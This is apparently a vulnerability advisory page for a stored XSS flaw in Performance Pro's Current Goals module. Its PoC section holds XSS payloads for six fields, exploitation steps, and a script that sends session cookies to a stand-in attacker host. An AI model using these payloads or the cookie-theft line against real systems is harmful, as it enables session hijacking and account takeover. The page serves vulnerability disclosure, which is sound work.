Security Vulnerability Report
中文
CVE-2025-60932 CVSS 6.1 MEDIUM

CVE-2025-60932

Published: 2025-10-21 15:15:39
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Multiple stored cross-site scripting (XSS) vulnerabilities in the Current Goals function of HR Performance Solutions Performance Pro v3.19.17 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Goal Name, Goal Notes, Action Step Name, Action Step Description, Note Name, and Goal Description parameters. The patched version is PP-Release-6.3.2.0.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

HR Performance Solutions Performance Pro v3.19.17
HR Performance Solutions Performance Pro < PP-Release-6.3.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-60932 PoC - Stored XSS in Performance Pro Current Goals Affected Parameters: Goal Name, Goal Notes, Action Step Name, Action Step Description, Note Name, Goal Description --> <!-- Payload examples for each vulnerable parameter --> <!-- 1. Goal Name parameter --> <script>alert('XSS-GoalName-'+document.domain)</script> <!-- 2. Goal Notes parameter --> <img src=x onerror="alert('XSS-GoalNotes-'+document.cookie)"> <!-- 3. Action Step Name parameter --> <svg onload=alert('XSS-ActionStepName')> <!-- 4. Action Step Description parameter --> <body onload="alert('XSS-ActionStepDesc')"> <!-- 5. Note Name parameter --> <input onfocus=alert('XSS-NoteName') autofocus> <!-- 6. Goal Description parameter --> <iframe src="javascript:alert('XSS-GoalDesc')"></iframe> <!-- Exploitation steps: 1. Authenticate to Performance Pro v3.19.17 2. Navigate to Current Goals module 3. Create a new Goal or edit an existing one 4. Inject one of the above payloads into the corresponding parameter field 5. Save the Goal/Action Step/Note 6. When any user (especially admin) views the affected Goal page, the malicious script executes in their browser context 7. Attacker can steal session cookies, perform actions as the victim, or pivot to further attacks --> <!-- Cookie stealing payload example (for demonstration only) --> <script>new Image().src="http://attacker.com/steal?c="+document.cookie</script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60932", "sourceIdentifier": "[email protected]", "published": "2025-10-21T15:15:39.330", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple stored cross-site scripting (XSS) vulnerabilities in the Current Goals function of HR Performance Solutions Performance Pro v3.19.17 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Goal Name, Goal Notes, Action Step Name, Action Step Description, Note Name, and Goal Description parameters. The patched version is PP-Release-6.3.2.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://docs.offsecguy.com/cve/hr-performance-solutions/vulnerability/reflected-xss-current-goals", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.